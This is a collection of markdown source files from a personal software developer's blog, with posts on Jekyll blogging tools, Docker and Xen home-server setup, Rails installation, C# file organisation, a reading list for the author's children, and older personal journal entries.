- [markdown](https://commonmark.org/help/) - this is important, it allows efficiently writing richly formatted blog posts with nothing but an (advanced) text editor such as vim or vscode
- [vim](https://www.vim.org/) the original text editor (see also [neovim](https://neovim.io/) that I haven't got around to using yet)
- [fzf the fuzzy finder](https://github.com/junegunn/fzf) - so I can type `**[tab]` and find any blog post easily
- [vscode](https://code.visualstudio.com/) with the [vscode vim emulator extension](https://marketplace.visualstudio.com/items?itemName=vscodevim.vim) - ctrl-p to open any post quickly
- [git](https://git-scm.com/) - provides history, and a very quick way to ship changes to the host (github) all on the command line
- I have many [command line aliases in my dotmatrix](https://github.com/timabell/dotmatrix/blob/main/.aliases) and [aliases in my gitconfig](https://github.com/timabell/dotmatrix/blob/main/.gitconfig) - these make working on the commandline (cli) muuuch faster.
- Ruby locally (advanced coder things)
- [asdf-vm](https://asdf-vm.com/) to ensure I always have the right ruby version available on any machine, or can easily install it
- [tmux](https://www.howtogeek.com/671422/how-to-use-tmux-on-linux-and-why-its-better-than-screen/) to allow me to have the server running in the background while I use the editor
⚠️ Note: ignore the `_site` folder when choosing the file to edit, that's the generated cache and will be overwritten.
# Summary
Wordpress was overcomplicated for my needs, and slower to use/read, this new setup should mean I can tap away on the train and send new thoughts your way more regularly.
# Extras
* Bonus points for MailChimp's [rss to email](https://mailchimp.com/features/rss-to-email/) which means it'll automatically hit your inbox. (I haven't managed to make it work yet though.)
* Here's all the jekyll gems github pages allows you to add <https://github.com/github/pages-gem/blob/master/lib/github-pages/plugins.rb#L5>
<file_sep>---
layout: post
title: Ubuntu screen locking
date: '2007-07-02T21:15:00.000Z'
author: <NAME>
tags:
- howto
- ubuntu
- linux
- laptop
modified_time: '2007-07-02T21:23:01.224Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-6079608926457625139
blogger_orig_url: https://timwise.blogspot.com/2007/07/ubuntu-screen-locking.html
---
Howto prevent ubuntu locking the screen when closing the laptop lid.
Thanks to jrib in irc://freenode.net/#ubuntu for this one.
* Run gconf-editor (with alt+F2)
* Go to or search for /desktop/gnome/lockdown
* Tick disable_lock_screen
* Restart gnome (ctrl+alt+backspace - after saving your documents it's a bit brutal!)
<file_sep>---
title: Single class per file
layout: post
---
Reasons you should prefer a single `class` / `interface` / `record` / `enum` / `struct` per file in C# projects.
## Cognitive load
Multiple types per file increases the cognitive overhead of remembering where everything lives.
When working on a project, having to remember where each thing is hidden and how things are organised is extra mental load that can be eliminated by following the simple rule of "every class gets a file" regardless of how trivial or short they may be.
## Reduced dependence on IDE support
IDEs that can jump to a definition are not the only tool we use to inspect and navigate code.
By hiding multiple types in a file where the name doesn't match you make it harder to operate in a codebase without a full IDE.
You might be an IDE-only developer but not everyone operates that way, and you might be missing out on some other excellent tools out there.
## Git merge conflict avoidance
You are more likely to run in to merge conflicts if you put types all together in one file as multiple developers work on a project. Especially when things get moved / renamed / refactored.
## Simple refactoring
Putting multiple things in a file breaks refactoring tool flows (resharper) which assume they can rename files to match types.
## Can be applied consistently
Having multiple types per file requires you to make constant judgement calls about what goes together in one file and what is separate. Different developers will inevitably make different judgement calls.
This problem can be entirely eliminated by sticking to class-per-file.
It is impossible to come up with a concrete rule for exactly what goes together in a file and what is separate, whereas the rule of one-class-per-file is trivial to apply consistently.
## Avoid need for additional naming
If you have one class in a file you can name the file the same as the class. If you have two types in a file what do you name the file?
If you have two types in a file you now have to come up with a *third* name that covers both things, or use the name of only one of the things, which is then misleading / surprising. By having a class per file you eliminate this entirely.
## But wait, what about tiny little records
A project I was on recently made heavy use of the newer [`record`](https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/builtin-types/record) type, which is cool because they're (usually) immutable. In that project there was a coding style of lumping all related records together in one file, and I must confess that I'm happy to make the exception for tiny one-line record types that only exist as child types to a parent record, and they can go in the parent's file. As soon as they are shared between two parents at that point they have to go in their own file otherwise the structure makes no sense any more.
For example if `Pet` is only referenced through Person then I'm cool with `Tattoo` living in `Person.cs`:
```c#
public record Person(string FirstName, string LastName, Hair Hair, List<Tattoo>);
public record Hair(string Colour, int LengthCm);
public record Tattoo(string Description, bool HasColour);
```
Without accepting this nuance the result is thousands of tiny files, which ends up being harder to navigate. Use your judgement wisely.
## I hear C and Rust like huge files
I have seen in Rust at least that there's a cultural preference for "one big file" that defines a whole thing. This is interesting, but not something I'd be keen to import into C# projects which have a much stronger thing-per-file heritage and where I've seen both and far prefer the class per file style.
<file_sep>---
title: "new blog, take two"
date: 2007-03-13
slashdot_url: https://slashdot.org/journal/166369/new-blog-take-two
---
<p>ok, that was an enormous failure.</p>
<p>installed wordpress on a machine at home. got hacked (duh). spent a month working my butt off at work and haven't even looked it.<br>second attempt here: <a href="http://timwise.blogspot.com/">http://timwise.blogspot.com/</a></p>
<p>will be full of lots of fascinating open source exploits. might even start posting pretty photos with flickr.</p>
<file_sep>---
title: A book list for my children
layout: post
---
This is for my children when they're old enough to read them and benefit from them, and when they decide to take an interest in the advice of their boring old man, however I'd recommend this list to anyone no matter their stage in life.
What book should you read next? Well, what problem are you trying to solve right now? That said, there are some eternal problems in life such as interpersonal relationships and the search for financial stability and fulfilment which these books help navigate.
I've added a note to each explaining why you should read it, and when you might want to make it a priority. I've also put them in an order that I think would be sensible; with the most foundational first (personal growth) followed by more wealth and lifestyle focussed volumes.
## Being human
1. [The 7 habits of highly effective people; <NAME>](https://www.amazon.co.uk/Habits-Highly-Effective-People/dp/0684858398)
* Why? It's important to know you can change who you are and be a better person, and know how to do so. You can be better with relationships and those around you. This book is an inspiration in personal growth.
* When to read: as a young adult, and again when you're older and wiser. Or right now if you're already both of those.
1. [Daring Greatly by <NAME>](https://www.amazon.co.uk/Daring-Greatly-Courage-Vulnerable-Transforms-ebook/dp/B00APRW2WC)
* Why? Our society teaches all the wrong lessons around guilt, shame and vulnerability. Our default responses to that are self-destructive. Brené shows us how to be brave enough to accept the challenges of life without hurting others to protect ourselves. The difference between guilt ("I did something that was wrong and regret it") and shame ("I'm a bad person") is often misunderstood or ignored entirely. When you think clearly about this it becomes clear that guilt is good and shame is bad.
* When to read: As early as you can, and maybe again if you find yourself falling into the traps of self-shaming, shaming others or not having the courage to do hard things for fear of failure.
1. [Nonviolent Communication; <NAME>](https://www.amazon.co.uk/Nonviolent-Communication-Create-Relationships-Harmony/dp/B00TIWFAV0/)
* Why? Somewhat surprisingly perhaps the calm and empathic approach to communication is superior; but that's easier said than done with our brains evolved for times gone by.
* When to read: As soon as you argue with someone and wonder what it achieved or it cost you dearly. Ideally before that happens.
1. [Bonds That Make Us Free; <NAME>](https://www.amazon.co.uk/Bonds-That-Make-Free-Relationships/dp/B07N149VZK/)
* Why? Yes, it's another book on dealing with people. The truth is it's not them it's you; but the good news is that you have the power to change what's wrong. It turns out that dealing with people is important, and is foundational in all walks of life.
* When to read: As soon as you can, and then probably every decade after that.
1. [So good they can't ignore you; Cal Newport](https://www.amazon.co.uk/Good-They-Cant-Ignore-You/dp/0349415862/)
* Why? Don't believe the hype at work, people hire for your real skills and what you can do for them. More details and foundational career advice for any path you choose lie within.
* When to read: Probably before your first or second job, but better late than never. If you've retired rich before you read this then maybe don't bother!
1. [The Life-Changing Magic of Tidying; <NAME>](https://www.amazon.co.uk/gp/product/0091955106/)
* Why? Because too much stuff ironically makes you less happy. Go figure. A practical guide to a calming and tidy house/room/boat/mansion/office from someone a little obsessed with tidy.
* When to read: When you're fed up hearing me complain your room's a mess. Or later on when you realise why I complained about it but don't really know how to fix it.
1. [48 Laws of Power; <NAME>](https://www.amazon.co.uk/48-Laws-of-Power/dp/B00WYRC0L4/)
* Why? Sadly the world is not the cuddly, friendly, fair and equitable world some people seem to think they can wish into existence by will power and singing alone. There are plenty of good things, but the hard truths about raw underlying human nature are best understood so you can deal with them if you need to. I trust you are a good human being who will only use some of the darker knowledge in here for good and personal survival.
* When to read: I hesitate to say early because used without experience this knowledge will get you into more trouble than it gets you out of. That said, earlier the better but don't rush into using it, just observe the people around quietly with this new knowledge for the next few years at least.
## Money and work
1. [Rich dad, poor dad; <NAME>](https://www.amazon.co.uk/Rich-Dad-Poor-Teach-Middle/dp/1612680194/)
* Why? Money isn't everything, but not having it will make you miserable. And the thing that will make you poor beyond anything else is your mindset and financial education. Read this to learn what the people who never seem to work do and why they never seem to run out of money.
* When to read: As soon as your bank account hits zero for the first time, and any time you are annoyed that you still have that sucky job you hate but can't escape from (happens to us all I think).
1. [Think and Grow Rich; Napoleon Hill](https://www.audible.co.uk/pd/Think-and-Grow-Rich-Audiobook/B00O5DGGZQ)
* Why? More money will let you solve more problems, have more freedom, help more people, and live your best life. But it's not that easy to know where to start without a role model and a plan. Good practical guidance in here. Time will tell if I make good use of it myself.
* When to read: After the first few years of plying a trade perhaps, but don't leave it too long.
1. [The 4-Hour Work Week; <NAME>](https://www.amazon.co.uk/The-4-Hour-Work-Week/dp/B0065LN8DE/)
* Why? Working for someone else 9-5 isn't the only way to make a living. This book might age when it comes to tactics, but the inspirational vision of another way of life is timeless.
* When to read: Whenever you've had enough of a job. Or maybe if you just want to dream, or travel.
1. [The Road Less Stupid; <NAME>](https://www.amazon.co.uk/The-Road-Less-Stupid/dp/B07DJY4RSQ/)
* Why? Whatever money and success you achieve, it's very easy to throw it all away again by doing dumb things that seemed like a good idea. This is a straight-talking guide to not doing that. Contains important lesson about protecting against downside risk (i.e. a small chance you lose everything) when chasing upside risk (i.e. a chance to be much richer etc). Unmitigated downside risk has the power to destroy everything you've worked for.
* When to read: Sooner rather than later, especially if you're feeling a bit ambitious.
## The meaning of life, evolution and religion
1. [The Blind Watchmaker; <NAME>](https://www.amazon.co.uk/gp/product/0141026162/)
* Why? Evolution is often poorly understood. As the foundation of our existence and behaviours this to me is a must read to truly understand life. For me it answers the question of "what is the point in life"; ironically there is no point really, but that is more freeing than some deity with odd morals. Just know that you can know the raw mechanics and still live a full, happy and meaningful life; helping all those around you.
* When to read: Whenever you have some time. Kinda background knowledge for life.
1. [The God Delusion; <NAME>](https://www.amazon.co.uk/gp/product/0593055489/)
* Why? God is all around us in the many peoples of the world. His name(s) are often used to manipulate and exploit, and play power games. You and I can probably do nothing about this (and it's dangerous territory to tread in, I'm surprised Dawkins is still alive), however I think the knowledge is an important piece of the complex puzzle that is humanity. Once you've read this, don't judge those who believe for whatever reason, you will not change them and you will only cause hurt.
* When to read: Whenever you have time, any time you are considering the meaning and truth of religion, and any time you want to be able to discuss the topic with more useful information.
## Children of your own
1. [Pregnancy For Men](https://www.amazon.co.uk/Pregnancy-Men-whole-months-PAPERBACK-ebook/dp/B088PHPKRK)
* Why? Nothing can prepare you for this experience, and men are an anxious side-show. This book helped me cope, and even occasionally be useful.
* When to read: As soon as you think you'll have a kid on the way, don't leave it till the due date or you'll miss the pre-natal stuff.
1. [How to talk so Kids Will listen](https://www.amazon.co.uk/Talk-Collection-Books-talk-listen/dp/9526533585)
* Why? Nothing about communicating well is natural or obvious. It takes work and understanding, and undoing cultural failings. This series is one of the best, kindest works out there, and helped me immensely.
* When to read: When your kids are starting to talk.
1. [Hold on to Your Kids: Why Parents Need to Matter More Than Peers](https://www.amazon.co.uk/Hold-Your-Kids-Parents-Matter-ebook/dp/B07DK2CZ2V)
* Why? Culture is teaching us to ignore our parents with devastating consequences for all involved. It turns out "attachment" is the key, and when it goes wrong nothing you do will work.
* When to read: When your kids are 4+ years old.
---
Personally I like the audiobook format, and at time of writing a yearly subscription to Audible was good value for getting easy access to the content, and a narration from the author or a good speaker makes for a more memorable experience.
Beyond this list, check the best-seller lists for whatever subject you wish to excel at. There's no point learning the hard way when you can learn from someone who has. Even in this digital age books still pack a tremendous punch; the result of someone pouring 20+ years of their experience into something you can read in a week is like liquid gold. I also have recorded a lot of [my personal reading list on GoodReads](https://www.goodreads.com/user/show/50628592-tim-abell).
To my little people who will soon be bigger than me in every way, love you 💕️👊️, Diddy x
P.S. If you're reading this and you're not my kid, well I love you too for being the lovely human I know you are.
<file_sep>---
title: "woo!"
date: 2004-10-17
slashdot_url: https://slashdot.org/journal/87160/woo
---
<p>b3ta postage.<br><a href="http://www.b3ta.com/board/3836198">http://www.b3ta.com/board/3836198</a></p>
<p><nobr> </nobr>:D</p>
<file_sep>---
title: New podcast episodes - rust meetups and fast talkers
layout: post
---
If you're a podcast lover and interested in tech you might be interested in the two new episodes I've published this week
## Rust Workshop
- [Rust meetups and DevOps pipelines with end-to-end testing for confident fast shipping](https://share.transistor.fm/s/f4dbb201)
## Software Should Be Free
- [Beware "Fast Talkers" and "Pattern Obsessives" - evolve your architecture](https://share.transistor.fm/s/e4e48a64)
---
<iframe width="100%" height="180" frameborder="no" scrolling="no" seamless src="https://share.transistor.fm/e/e4e48a64"></iframe>
<iframe width="100%" height="180" frameborder="no" scrolling="no" seamless src="https://share.transistor.fm/e/f4dbb201"></iframe>
<file_sep>---
layout: post
title: tim; now available with flickr pics
date: '2007-03-23T22:21:00.000Z'
author: <NAME>
tags:
- flickr photos
modified_time: '2007-03-23T23:37:22.215Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-7110396020145859598
blogger_orig_url: https://timwise.blogspot.com/2007/03/tim-now-available-with-flickr-pics.html
---
[me on flickr](http://www.flickr.com/photos/7463254%40N02/)
I've now started putting pretty photos up on flickr.
here's my first pic:

<file_sep>---
layout: post
title: New home server with Xen and docker
date: 2017-03-10 00:03:48.000000000 +00:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/03/10/new-home-server-with-xen-and-docker/"
---
## No cloud mkay?
Going against the current received wisdom I personally am not keen to trade the convenience of the public cloud sync services such as dropbox, onedrive, google drive etc for the fact that this means that all my files traverse the public internet and live on someone else's metal. Sure it might be encrypted, but what if my traffic is intercepted and stored, and then that encryption is later found to be flawed?
I'm probably just as likely to get pwned running my own setup, but hey at least I get to learn something along the way.
Another thought is that regardless of location - home, office, cloud, vps host or data centre - it's all just (server) software. So why shouldn't we be able to get the amazing seamless experience when self hosting? It seems to me that it comes down to economics. Cloud hosting gives an opportunity for charging directly or worse using underhand tactics like owning your data or selling you as a product to advertisers. This means there is more funding for cloud systems, and therefore more developers are working on it. Even ethically minded software developers have to eat and live somewhere. I think just like Linux vs Windows we will get a perfectly good open source solution, but it will likely lag behind.
## Disk encryption
I have a new machine to use as a server so have an opportunity for a fresh approach. I want my server encrypted at rest in case the whole machine gets stolen from the house to keep the scoundrels from having easy access to all my files.
The previous machine I installed with encrypted LVM as available with Ubuntu server's installer; but this means going to the machine to unlock it after every reboot / power failure / kernel upgrade. I did have [remote unlock via dropbear ssh](http://blog.nguyenvq.com/blog/2011/09/13/remote-unlocking-luks-encrypted-lvm-using-dropbear-ssh-in-ubuntu/) set up but it's hacky to set up and non-trivial to use.
This time I've gone for a different approach:
* An unencrypted install of ubuntu server (Dom0) with an ssh server, so no password required to boot up, which does nothing more than give access to:
* A Xen VM install of Ubuntu server (DomU), this one with LVM disk encryption. This is where all my files etc will live. Installed with [virt-manager](https://virt-manager.org/), which is a very convenient UI for initial setup.
So now after a reboot I can `ssh -X` into the Dom0 server, then using virt-manager I can see the DomU VM waiting for the disk encryption key and provide the passphrase.
## Xen
[Setup instructions for xen on Ubuntu](https://help.ubuntu.com/community/Xen#Installing_Xen).
It wasn't immediately obvious how to set up the networking. This was the network config that worked in the end (after ifdown/ifup, also tested with full reboot):
```
$ cat /etc/network/interfaces
source /etc/network/interfaces.d/*
# The loopback network interface
auto lo
iface lo inet loopback
auto xenbr0
iface xenbr0 inet dhcp
bridge_ports enp1s0
# The primary network interface
auto enp1s0
iface enp1s0 inet manual
#iface enp1s0 inet dhcp
```
## Docker
Seeing as docker is well and truly coming to windows it's time I got better at this, so for this reason — and also for better isolation and security — I'll try and set up as many of the services I want to run as I can through docker.
First test case was [transmission-bt](https://transmissionbt.com/) which I run to be a good citizen and help seed [Linux Mint ISOs](https://www.linuxmint.com/download.php) using my [A&A unmetered upload](https://aa.net.uk/broadband-home1.html).
[Searching for transmission on docker hub](https://hub.docker.com/search/?isAutomated=0&isOfficial=0&page=1&pullCount=1&q=transmission&starCount=0), I didn't want the vpn one, I'm not pirating movies and my ISP doesn't do stupid filtering/shaping tricks on torrents. I chose the next most popular: [https://hub.docker.com/r/linuxserver/transmission/](https://hub.docker.com/r/linuxserver/transmission/)
To install and run it:
```
$ sudo -i
# useradd -r -s /sbin/nologin transmission
# id transmission
id=999(transmission) gid=999(transmission) groups=999(transmission)
# cd /var
# mkdir transmission
# cd transmission
# mkdir config downloads watch
# chown transmission:transmission .
# docker create --name=transmission \
-v /var/transmission/config/:/config \
-v /var/transmission/downloads/:/downloads \
-v /var/transmission/watch/:/watch \
-e PGID=999 -e PUID=999 -e TZ="Europe/London" \
-p 9091:9091 -p 51413:51413 -p 51413:51413/udp \
linuxserver/transmission
# docker start transmission
# docker logs -f transmission
```
useradd ref: [http://askubuntu.com/questions/29359/how-to-add-user-without-home](http://askubuntu.com/questions/29359/how-to-add-user-without-home)
Once that was done I could see the transmission web UI at `http://dom1vm:9091/`. Hurrah.
## syncthing
[https://store.docker.com/community/images/linuxserver/syncthing](https://store.docker.com/community/images/linuxserver/syncthing)
Same deal with folders and users, then:
`# docker create --name=syncthing -v /var/syncthing/config/:/config -v /var/syncthing/data/:/data -e PGID=998 -e PUID=998 -p 8384:8384 -p 22000:22000 -p 21027:21027/udp linuxserver/syncthing`
## Start on boot
```
docker update --restart=unless-stopped transmission
docker update --restart=unless-stopped syncthing
```
[http://stackoverflow.com/a/37479753/10245](http://stackoverflow.com/a/37479753/10245)
## Todo
* [nextcloud](https://nextcloud.com/) - has an iOS app that syncthing doesn't yet, might also have better selective sync
* <https://store.docker.com/community/images/wonderfall/nextcloud>
* plex server
* <https://www.plex.tv/>
## Further reading
* <https://forum.level1techs.com/t/dexter-kanes-ultra-paranoid-encrypted-nas-completed/98340>
<file_sep>---
title: Remote code interview pairing tools
layout: post
---
Things that you could use to do simple coding exercises in the new world of remote everything.
* [CodeInterview.io](https://codeinterview.io/) - $5/interview or $55/month
* [CodeSandbox.io](https://codesandbox.io/)
* [Cyber-dojo](https://cyber-dojo.org/creator/home) - free for non-commercial, set your own price for commercial!
* [VSCode live share](https://marketplace.visualstudio.com/items?itemName=MS-vsliveshare.vsliveshare-pack) works well, it can do voice as well.
* Zoom/hangouts/meet/skype etc. built-in screen sharing and whatever coding setup they already use.
Thanks to my friends at eSynergySolutions for the suggestions, recorded here because the internet has a better memory than me.
<file_sep>---
layout: post
title: Running sdv in docker
date: 2017-08-13 20:35:14.000000000 +01:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/08/13/running-sdv-in-docker/"
---
Just bought a shared server with [bytemark](https://www.bytemark.co.uk/). (£10/month), Installed vanilla ubuntu 16.04LTS server using the control panel (virtually one-click).

(Love the cancel button text!)
Ssh'd in, created my own user to use with sudo instead of root. Ran the following, and immediately had a copy of sdv listening on the internet.
```
sudo apt install tmux docker docker-compose
sudo adduser tim docker
# logout & reconnect to get new group to take effect
wget https://raw.githubusercontent.com/timabell/sdv-docker/master/docker-compose.yml
```
and then for the magic:
```
tim@sdvweb:~$ docker-compose up
Pulling sdv (timabell/sdv:latest)...
latest: Pulling from timabell/sdv
d5c6f90da05d: Pull complete
1300883d87d5: Pull complete
c220aa3cfc1b: Pull complete
2e9398f099dc: Pull complete
dc27a084064f: Pull complete
eb1a4736b68c: Pull complete
0706cf350247: Pull complete
1d0ac78e96a5: Pull complete
Digest: sha256:9003a79f019b3ee16e7c6324afd275b4535f867602e63db317e430528e2a6771
Status: Downloaded newer image for timabell/sdv:latest
Creating tim_sdv_1
Attaching to tim_sdv_1
sdv_1 | ./sdv-linux-x64 -listenOn 0.0.0.0 -port 8080 -driver sqlite -db /data/Chinook_Sqlite_AutoIncrementPKs.sqlite
sdv_1 | 2017/08/13 19:14:44 Sql Data Viewer v0.4; Copyright 2015-2017 <NAME> <<EMAIL>>
sdv_1 | 2017/08/13 19:14:44 ## This pre-release software will expire on: 2017-10-01 00:00:00 +0000 UTC, contact <EMAIL> for a license. ##
sdv_1 | 2017/08/13 19:14:44 Starting server on http://0.0.0.0:8080/ - Press Ctrl-C to kill server.
```
And that's it, listening on the internet!

Any changes I make will be to the [docker and compose files](https://hub.docker.com/r/timabell/sdv/), resulting in trivially easy to repeat deployments, making the server completely throwaway. Huzzah! Docker is awesome.
I've also bought a domain for the product, but haven't set much up on it yet: <http://www.sqldataviewer.com/>
Next up, getting nginx reverse proxy to provide ssl. And finishing the refactor I was in the middle of to get data types to behave, and finishing the automated regression tests I'd just started (needed for reliable multi rdbms support), and finding my market, and marketing the product, and doing more features, and build the marketing automation to drive sales, etc etc. Not too much to do then! Your support would be appreciated, if you're interested make sure you [sign up to the mailing list now](https://www.getdrip.com/forms/70504364/submissions/new)!
If you're wondering why docker matters more generally then listen to this podcast episode: Hanselminutes: Practical Containers for Developers with Aja Hammerly <http://www.hanselminutes.com/default.aspx?ShowID=18514>
<file_sep>---
layout: post
title: Getting rails 4 up and running with rbenv on Ubuntu 13.10
date: '2013-12-04T23:16:00.003Z'
author: <NAME>
tags:
modified_time: '2013-12-05T10:09:30.811Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-6247915904489237488
blogger_orig_url: https://timwise.blogspot.com/2013/12/getting-rails-4-up-and-running-with.html
---
_Brain dump warning!_
This is a follow up to
[Installing ruby 2 + Rails 4 on Ubuntu 12.04 LTS](/2013/05/13/installing-ruby-2-rails-4-on-ubuntu/)
and is just a list of steps needed to get a clean install of Ubuntu up to speed
with an existing site.
* Install rbenv to manage ruby versions
* [https://github.com/sj26/rbenv-install](https://github.com/sj26/rbenv-install)
* `git clone https://github.com/sstephenson/rbenv.git ~/.rbenv`
* Install ruby-build to manage installation of ruby versions into rbenv
* [https://github.com/sstephenson/ruby-build](https://github.com/sstephenson/ruby-build)
* `git clone https://github.com/sstephenson/ruby-build.git ~/.rbenv/plugins/ruby-build`
* For convenience install dotmatrix - this will set up the rbenv environment correctly, amongst other things
* clone [https://github.com/timabell/dotmatrix](https://github.com/timabell/dotmatrix)
* run bin/install
* restart any running terminal(s) to get rbenv
* get a project (includes a .ruby-version file for rbenv, and a Gemfile for bundle)
* `git clone <EMAIL>:timabell/symbol-library.git`
* `sudo apt-get install libssl-dev libreadline-dev`
* readline is needed for rails console, and has to be installed before ruby. If you've already installed ruby then just re-run rbenv install and it will overwrite the existing build with a version with readline support. ref: [http://vvv.tobiassjosten.net/ruby/readline-in-ruby-with-rbenv/](http://vvv.tobiassjosten.net/ruby/readline-in-ruby-with-rbenv/)
* `rbenv install x.x.x-xxxx`
* autocompletes, yay!
* .. or better still reads from .ruby-version I think so you can just run `rbenv install` if you are in the project folder
* `gem install bundler`
* from the right directory so done for right ruby version
* rbenv rehash
* `bundle`
* will install all the gems for the project
* ~~don't `sudo apt-get install rbenv`~~ ~ doesn't provide sufficiently up to date ruby
* ~~don't `gem install rails --version 4.0.2 --no-ri --no-rdoc`~~ ~ don't need this when you have a gem file with rails in it, bundle will do it for you
* `sudo apt-get install nodejs`
* for javascript runtime (rails server throwing an error without this)
* `bundle exec rails server`
* `bundle exec rails console`
* needs readline (see above)
Other stuff I like in my install
* dotmatrix bin/vimbundles
* includes vim-rails and friends
* full list [https://github.com/timabell/dotmatrix/blob/master/bin/vimbundles.sh#L45](https://github.com/timabell/dotmatrix/blob/master/bin/vimbundles.sh#L45)
* console colours from bin/solarize.sh in dotmatrix/bin
* tmux
This is mostly for my own reference but maybe it'll help someone else out.
<file_sep>---
title: "Things + lycra swimwear & goggles"
date: 2004-01-29
slashdot_url: https://slashdot.org/journal/60096/things--lycra-swimwear-goggles
---
<p>Given up counting lengths. Working on technique now (think - "I like your style!"). That's not to say I've missed any sessions, in fact quite the opposite, I've been four times this week. Met up with the Triathletes on Monday, swam tues am practicing what I'd been taught, back with the triathletes wed eve (after drama tues night, first rehearsal) got more help from Mark (thnks mark, much appreciated) and could feel I was getting closer, if not faster, then usual thur am session for more practice, with some degree of success. Been at jongleurs tonight for laughs and cavorting, a good night was had by all (I think).</p>
<p>Back to town for proper session tomorrow with A and others, should be messy<nobr> </nobr>;)</p>
<file_sep>---
title: "Commuting by Bike"
date: 2004-07-12
slashdot_url: https://slashdot.org/journal/77152/commuting-by-bike
---
<p>Hello.</p>
<p>I just got in from work. This is the first time I've ridden to my new job. It's 9.9 miles each way, and reasonably flat except for a few sharp rises and drops. All this fitness stuff is really starting to pay off, I averaged 18.5mph on the way to work (32 mins) and 19mph on the way home (31 mins). That's by far the best speeds I have ever attained. I did once manage 20mph but it was over a much shorter distance and I probably had the wind with me (parp).</p>
<p>My cycling has been really important to me ever since my first trike. I let it slip once not long after I got a car, laziness ruled and I didn't go out for ages. The final straw was one christmas when I went for a short ride to relieve the boredom. I didn't even make it a mile up the road, and I was so annoyed with myself that I haven't stopped since.</p>
<file_sep>---
title: How to be a highly valued developer
layout: post
---
## Learn to code... then get endlessly better at coding...
1. Be good at coding.
2. The end.
3. ... but wait, there's more.
There is truly endless training available for getting better at the craft of being a developer:
* For programming languages:
* There's online courses, in-person courses, video training, coding Katas, live programming playgrounds, free courses, reaaaaly expensive courses, or you could just sit with language documentation and an editor and compiler and just learn by doing.
* There's training for all the mainstream programming languages such as C#, Javascript or Ruby
* Or maybe you could [learn more about languages that might give you a new angle on things](https://www.amazon.com/Seven-Languages-Weeks-Programming-Programmers/dp/193435659X) such as Erlang, Haskell or Lisp and then bring those concepts back to the current language of your project making you a better and more well rounded programmer.
* Then there's the frameworks such as Rails, NodeJS, ASPNET etc which are all huge things to learn in their own right. Again there's many ways to learn these tools of the trade such as:
* Read the docs
* Take a Pluralsight / Coursera / course
* Try building something and do a lot of stackoverflow searching
* Pair with someone else or work on a team and learn together and from each other
I could probably go on all morning thinking of all the ways to learn more about the pure skill of programming, or "sharpening the saw" as <NAME> likes to call it.
Becoming a programmer, then becoming excellent at the raw skills of programming is of course something that's been done to death, because it's a fundamental skill. You can't be a programmer at all by just learning SCRUM if you still don't know how to write an `if-else` statement. I don't have much more to add to what's out there on this, if you want to learn to code or want to be a better programmer you don't even need to spend money these days, just go and do it. I don't mind lending a hand if you get stuck, but it's not like I hold some magical secret as a programmer. I am not a member of some Pratchett-esque "Ancient Guild of Programmers" with access to the only true source of ancients' algorithms; it's all out there, it's just tricky to wrap your head round turning a pile of ASCII into stuff that works, and then trickier still to make it maintainable and easy to iterate on as needs evolve and change. This is a critical foundation of the skill and not something to be skipped. In fact if you're a programmer reading this you'd do well to read the [article by <NAME> titled "Being Glue"](https://noidea.dog/glue) (also a very good talk if you prefer video) before paying too much heed to the next section.
There is however a reason I am taking up your time in an era of all-the-information-you-can-eat. There are other aspects to being a truly *great* programmer that go beyond ingenious use of raw code. Having been around for a while I've started to see patterns in what makes for great teams that are a pleasure to work in and who get things done. I want to get that captured here so that good programmers can learn how to be one of those sought-after people, and to help leaders and managers know what to filter for when building great teams.
## Beyond coding - being a *really* great developer
* Leave ego at the door.
* Be humble.
* Speak up when you think things need to be different, even if it's not a programmer thing.
* Focus on success/failure of the project above individual productivity.
* Focus on small iterative delivery
* Not just knowledge of agile structures such as scrum, xp and kanban but a drive to see them done well and iterated on.
* Ability and desire to educate upwards - you are the expert, help those above and around you understand.
* Belief that team output is more important than personal output.
* Ability to separate ones own ego from a technical opinion - so when an idea is debated it is not viewed as a personal attack.
* Constant iteration in personal productivity, e.g. learning to touch-type, creating aliases for common commands. It's not so much that this makes you faster, it's more about what it says about the attitude you bring to everything. If you don't constantly improve your own things, would you constantly improve your client/company things? These things pay compound returns, particularly by freeing up mental space for the next thing.
* A drive for simplicity.
* An avoidance of "clever" - valuing future maintainability and legibility for other programmers over your own programmer ego. (This one is straying into pure programmer skills but I mention it as it's not something you'll get from a course on C#).
* Consider how code and systems could behave not just under perfect "happy path" conditions, but how it would behave under unexpected conditions, failure, bad input, maybe even when in the hands of a hostile attacker. Would it be catastrophic? Would it be easy to troubleshoot and fix? Would it give a hacker a leg-up to even greater evil powers?
* Empathy for your team.
* Empathy for your users, including a11y needs.
* A desire to be in contact with end-users (whether or not the organisation is supportive of this, I love that GDS style teams have dedicated "user research" functions to connect programmers to end users).
* Know when it's important to polish and when to just ship fast.
A lot of this is down to personal growth, which takes a lot of work. I've recommended some books that are relevant to this in [A book list for my children](/2021/01/25/a-book-list-for-my-children/), and there's more scattered around my [goodreads list](https://www.goodreads.com/review/list/50628592?shelf=read). If you're a programmer then work on these things. If you're a hiring manager then be sure to filter for these things, you can't train them in the time it takes to run a project, and maybe not even over an entire employment.
<file_sep>---
title: "funky flash game"
date: 2005-07-30
slashdot_url: https://slashdot.org/journal/113239/funky-flash-game
---
<p>Don't let the little dude catch your cursor!</p>
<p><a href="http://www.onemorelevel.com/games/avoider.html">http://www.onemorelevel.com/games/avoider.html</a></p>
<p>brought to you by b3ta.com (of course) issue 191</p>
<file_sep>---
title: "Question: where are we at with dynamic static sites?"
layout: post
---
So tell me about dynamic static sites...
# History lesson
I've been a software engineer primarily creating dynamic websites for a loooong
time. First there was a server with html files and caching proxies. Then there
were scripting extensions (cgi, php, asp-classic etc) to spice up your html,
then there were full mature web frameworks for all the things (asp.net mvc,
ruby on rails etc).
But then we got traffic and libraries and platforms and sdks and databases in
the cloud and everything became slow. 😞
So we added CDNs to make it all fast, and cache invalidation to make the
engineers cry.
Now what's old is new again, but with a twist, static sites pre-generated by
dynamic code (such as my blog created with jekyll). We get the benefits of old
- CDNs love static sites; caching and proxying work again; and cache
invalidation still makes us cry.
